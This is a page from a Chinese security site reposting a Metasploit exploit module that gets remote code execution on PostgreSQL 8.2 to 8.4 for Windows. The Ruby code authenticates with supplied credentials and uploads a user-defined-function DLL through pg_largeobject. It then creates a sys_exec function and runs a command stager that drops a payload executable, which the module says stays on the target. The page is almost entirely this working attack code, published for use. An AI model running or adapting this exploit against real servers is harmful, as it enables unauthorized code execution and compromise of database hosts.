首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PostgreSQL for Microsoft Windows Payload Execution
来源:http://www.metasploit.com 作者:Bernardo 发布时间:2011-03-24   
##
# $Id: postgres_payload.rb 12115 2011-03-23 21:24:09Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Postgres
	include Msf::Exploit::CmdStagerVBS

	# Creates an instance of this module.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PostgreSQL for Microsoft Windows Payload Execution',
			'Description'    => %q{
				This module creates and enables a custom UDF (user defined function) on the
				target host via the UPDATE pg_largeobject method of binary injection. On
				default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres
				service account may write to the Windows temp directory, and may source
				UDF DLL's from there as well.

				PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are 
				valid targets for this module.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished, as well as the UDF DLL and the OID.
			},
			'Author'         => 
			[
				'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the postgresql udf libraries 
				'todb' # this Metasploit module
			],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12115
, 'References' => [ [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf', 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], # Confirmed on XXX ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper. )) register_options( [ OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]) ]) deregister_options('SQL', 'RETURN_ROWSET') end # Buncha stuff to make typing easier. def username; datastore['USERNAME']; end def password; datastore['PASSWORD']; end def database; datastore['DATABASE']; end def verbose; datastore['VERBOSE']; end def rhost; datastore['RHOST']; end def rport; datastore['RPORT']; end def execute_command(cmd, opts) postgres_sys_exec(cmd) end def exploit version = get_version(username,password,database,verbose) case version when :nocompat; print_error "Authentication successful, but not a compatable version." when :noauth; print_error "Authentication failed." when :noconn; print_error "Connection failed." end return unless version =~ /8\.[234]/ print_status "Authentication successful and vulnerable version #{version} on Windows confirmed." tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version)) unless tbl && fld && dll && oid print_error "Could not upload the UDF DLL" return end print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})" ret_sys_exec = postgres_create_sys_exec(dll) if ret_sys_exec if @postgres_conn execute_cmdstager({:linemax => 1500, :nodelete => true}) handler postgres_logout if @postgres_conn else print_error "Lost connection." return end end postgres_logout if @postgres_conn end def dll_fname(version) File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll") end # A shorter version of do_fingerprint from the postgres_version scanner # module, specifically looking for versions that valid targets for this # module. def get_version(user=nil,pass=nil,database=nil,verbose=false) begin msg = "#{rhost}:#{rport} Postgres -" password = pass || postgres_password print_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") if verbose result = postgres_fingerprint( :db => database, :username => user, :password => password ) if result[:auth] # So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4 # This also checks to see if it was compiled with a windows-based compiler -- # the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw) # Also, the method to write files to disk doesn't appear to work on 9.0, so # tabling that version for now. if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i return $1 else print_status "Found #{result[:auth]}" return :nocompat end else return :noauth end rescue Rex::ConnectionError print_error "#{rhost}:#{rport} Connection Error: #{$!}" if datastore['VERBOSE'] return :noconn end end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Constructr CMS 3.03 Arbitrary
·HP OpenView Network Node Manag
·Progea Movicon 11 TCPUploadSer
·HP OpenView Network Node Manag
·IGSS 8 ODBC Server Multiple Re
·HP OpenView Network Node Manag
·VMCPlayer 1.0 Denial of Servic
·HP OpenView NNM nnmRptConfig.e
·Distributed Ruby send syscall
·HP OpenView Network Node Manag
·HP NNM CGI webappmon.exe OvJav
·HP OpenView Network Node Manag
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved